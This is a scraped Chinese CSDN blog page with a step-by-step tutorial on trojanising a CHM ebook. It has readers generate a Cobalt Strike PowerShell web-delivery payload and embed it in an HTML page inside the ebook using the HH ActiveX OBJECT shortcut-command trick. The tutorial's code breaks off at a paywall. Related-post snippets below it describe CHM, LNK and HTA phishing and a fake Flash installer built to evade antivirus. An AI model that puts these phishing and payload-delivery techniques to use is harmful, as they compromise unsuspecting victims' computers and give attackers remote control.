钓鱼篇-CHM电子书上线CS

最新推荐文章于 2024-06-23 01:00:00 发布
最新推荐文章于 2024-06-23 01:00:00 发布
阅读量2k 收藏 2
点赞数 1
文章标签: sql 数据库 database web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45701675/article/details/121491487
版权

1.对CS进行设置

服务端配置CS-客户端打开-攻击-钓鱼攻击-脚本web传递-配置选择监听器-设置端口-选择类型为power shell-点击开始-复制生成的利用代码

 

 

2.对当前.CHM电子书进行解压

 

 进入文件后选择任意文件夹进入

3.这里演示:进入-设备管理-打开setleds.html

4.把CS生成的利用代码插入到body里面去

利用代码:

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name&#
最低0.47元/天 解锁文章
无名安全
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
制作chm 手册_红队攻防之CHM文档钓鱼
weixin_42131443的博客
01-15 1366
0x00 CHM简单介绍CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。因为使用方容便,形式多样也常被采用作为电子书的格式。而该类型的文件是可以用Windows自带的hh.exe文件来进行打开。0x01 准备工具及流程准备工具:EasyCHM、Cobalt Strike、My...
钓鱼-office宏对象上线CS
weixin_45701675的博客
11-23 2538
office宏代码上线cobalt strike
使用powershell Client进行有效钓鱼
最新发布
aihua002的博客
06-23 1423
Powershell是windows下面非常强大的命令行工具,并且在windows中Powershell可以利用.NET Framework的强大功能,也可以调用windows API,在win7/server 2008以后,powershell已被集成在系统当中。除此之外,使用powershell能很好的bypass各种AV,在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来制作钓鱼文件。
Flash钓鱼->CS上线(免杀过火绒、360等)
热门推荐
weixin_54227009的博客
05-13 1万+
这个马儿是rar压缩的,做成的rar解压自启动,所以是个exe的文件,然后这里为了像一点,把图标给改了。这里砸门为了逼真一点,所以把这个压缩包的图标改成Flash的图标。3、将免杀的exe跟生成的PayloadFile进行压缩。5、将这个exe的压缩包的路径放在砸门服务器上的flash.js上即可。执行路径为:C:\Windows\Temp\Flash.exe。3.4、高级->模式->静默模式->全部隐藏。这里我把解压路径给改成了:C:\Windows\Temp。3.2、 高级->常规->解压路径。
cobaltstrike--CHM、LNK钓鱼&网站钓鱼
Z_l123的博客
01-22 3766
1.CHM钓鱼 1)制作CHM 创建一个文件夹(名字随意),在文件夹里面再创建两个文件夹(名字随意)和一个index.html文件 将下列代码复制到文件夹中的index.html中 <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> command exec <OBJECT id=x cla.
一道关于chm设计ctf钓鱼的一些思考
weixin_30820077的博客
06-09 154
版权声明:本文为博主的原创文章,未经博主同意不得转载 题目:flag就是文件指向的地址 文件:作为一名web狗的出题人,这道ctf有点意思不是在于因为它难,而是相对于一些代码审计以及一些杂项题来说,它只是很好玩。首先,我们看到题目是一个chm文件。chm文件在钓鱼中比较常见的。比如很久以前的那些动作片种子,下载回来总会有个chm文件的图片简介在文件目录下,那些充满诱惑的FBI war...
jdk8 api chm 中文_HW准备:Cobalt Strike之CHM、LNK、HTA钓鱼
weixin_39749501的博客
11-27 403
Cobalt Strike之CHM、LNK、HTA钓鱼如果手里没几个0day,就不要指望通过应用漏洞和系统漏洞打进去了,毕竟层层防护很难突破,与其不停的用头撞墙 不如研究下钓鱼CHM钓鱼CHM介绍CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。利用CHM钓鱼主要原因是因为该...
电脑超级技巧3000火力加强版 CHM电子书.rar
10-25
《电脑超级技巧3000火力加强版》是一本针对电脑用户提升技能、解决常见问题的实用指南。这本书以CHM(Compiled HTML Help)格式呈现,这种格式是...CHM格式的电子书便于随身携带,随时查阅,是学习和解决问题的好帮手。
品牌社交系列之-户外-克劳锐出品.pdf
05-15
### 品牌社交系列之-户外-克劳锐出品 #### 社交营销的重要性与发展趋势 在当今数字化时代,社交营销已成为品牌数字营销的关键领域之一。随着品牌方不断加大在社交平台上的投入,如何有效提升营销效果、促进产品...
使用CS-SVM的网络钓鱼电子邮件检测
03-08
使用CS-SVM的网络钓鱼电子邮件检测
行业资料-交通装置-一种便于垂钓的钓鱼车.zip
08-23
行业资料-交通装置-一种便于垂钓的钓鱼车.zip
HTML5小游戏【钓鱼游戏-朵拉钓鱼】游戏源码分享下载 - dldy.zip
05-29
-朵拉钓鱼】游戏源码分享下载 --- dldy.zipHTML5小游戏【钓鱼游戏--朵拉钓鱼】游戏源码分享下载 --- dldy.zipHTML5小游戏【钓鱼游戏--朵拉钓鱼】游戏源码分享下载 --- dldy.zipHTML5小游戏【钓鱼游戏--朵拉钓鱼】...
如何让Javascript脚本执行CS函数。
moshuchao的专栏
09-27 1380
        今天用AjaxControlToolkit控件CalendarExtender,想实现一个这样的功能:当用户选择某个日期后,执行一个验证的过程(与asp.net的Calendar控件的SelectionChanged方法)。于是我就找看有没有这样的事件,找了老半天,只找到一个属性:OnClientDateSelectionChanged,从字面上看应该就是这个了,但这个只支持脚本,
clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11 的详细用法
billhepeng的专栏
01-05 3839
value="Minimize"> value="Maximize">value="Close"> value=最小化 onclick=min.Click()> value=最大化 onclick=max.Click()> value=关闭 onclick=close.Click()>onclick="document.execCommand(open)" value=
网页编程的学习笔记
傾城如夢的专栏
09-29 4905
网页编程的学习笔记 一、JavaScript 二、ASP 一、JavaScript 0-1基本Html语言 n(1)超链接指定目标网页的Name &lt;Ahref="a1.htm"target="xzy"&gt;连结&lt;/A&gt; 一般情况下超链接打开的目标网页是在本网页之内打开的,但是利用上面的代码可以在新窗口中打开目标网页,再重新打开...
CHM攻击利用指北
MSB_WLAQ的博客
09-28 829
简介 "Compiled Help (or HTML) Manual"简称chm,即“已编译的帮助文件”,是由微软开发文档格式,可以被认为是一种类似于RAR等压缩打包的文件格式(可以使用7z等压缩软件直接打开), 可以包含html、图片、脚本语言以及其他文件。 当攻击者恶意利用此文件时,通常会在CHM文件内包含恶意脚本和文件,用户打开chm时便会触发恶意代码执行。著名恶意渗透框架如nishang等都支持生成CHM的恶意恶意利用。本文介绍了如何手动制作CHM,并梳理了常见的攻击利用方式。 手动制作CHM
js调用cs中函数的方法
weixin_30662011的博客
07-12 1015
在前台js代码里写上<%method();%> 举例: cs文件中写的有 public void method() { ....执行某些操作. } 这个函数,然后在前台页面的js里面调用. <script type="text/javascript"> ...
CS之攻击菜单详解-后门生成与上线
good good study
02-28 5324
能够生成如HTA文档、office宏、payload生成器、exe程序。 windows可执行程序exe 可以看到能生成两种windows可执行程序,其分别代表stage分阶段和unstage(stageless)不分阶段。传送门 ——>Cobalt Strike中payload的stage与unstage区别 选择监听器后,按需生成不同类型的exe 然后在目标机器运行即可上线 payload生成器 选择生成如下类型的后门 ——>https://che...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值